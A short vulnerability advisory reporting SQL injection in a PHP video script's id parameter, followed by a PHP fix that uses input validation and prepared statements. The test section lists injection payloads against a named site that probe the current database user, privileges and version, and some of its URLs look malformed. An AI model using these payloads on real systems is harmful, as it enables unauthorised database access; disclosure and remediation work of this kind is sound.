Title: php video script SQL Injection Vulnerability
Author: longrifle0x www.security-research.ge
: http://www.alurian.com/php-video-script/
Test Tool: SQLMAP
Overview
SQL injection found in video_tags.
* Test Method *
Link: http://www.bkjia.com/tag
Vulnerability link: http://www.bkjia.com/tag
http://www.bkjia.com/tag'/index.php?id=1
http://www.bkjia.com/tag'/index.php?id=1 [GET][id=-1][CURRENT_USER()
http://www.bkjia.com/tag'/index.php?id=1 [GET][id=-1][SELECT (CASE WHEN (SELECT super_priv FROM mysql.user WHERE user='none' LIMIT 0,1)='y') THEN 1 ELSE 0 END)
http://www.bkjia.com/tag'/index.php?id=1 [GET][id=-1][MID(VERSION(),1,6)
Fix
Filter the parameter input on the page listed above.
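
One way to apply that filtering to the id parameter, as an added example that is not the vendor's code: the value is validated as an integer and then passed as a bound parameter. The video_tags column names, the findTag() helper and the in-memory SQLite database (standing in for the script's MySQL database, and requiring the pdo_sqlite extension) are assumptions made for the example.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the script's database (the real script uses MySQL).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE video_tags (id INTEGER PRIMARY KEY, tag TEXT)');
$pdo->exec("INSERT INTO video_tags (id, tag) VALUES (1, 'music'), (2, 'sports')");

/**
 * Hypothetical lookup for the id request parameter.
 * Returns the tag name, or null when the id is invalid or unknown.
 */
function findTag(PDO $pdo, $rawId): ?string
{
    // 1. Allow-list validation: id must be a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Bound parameter: the value travels as data and is never spliced into the SQL text.
    $stmt = $pdo->prepare('SELECT tag FROM video_tags WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $tag = $stmt->fetchColumn();
    return $tag === false ? null : (string) $tag;
}

// Constructed request values: one valid id, then malformed values such as
// the id=-1 used in the test lines above.
foreach (['1', '-1', "1'", 'abc'] as $raw) {
    $result = findTag($pdo, $raw);
    printf("%-8s => %s\n", var_export($raw, true), $result ?? 'rejected');
}
```

In the real handler the raw value would come from $_GET['id'], and a null result should produce a generic error page rather than a database error message.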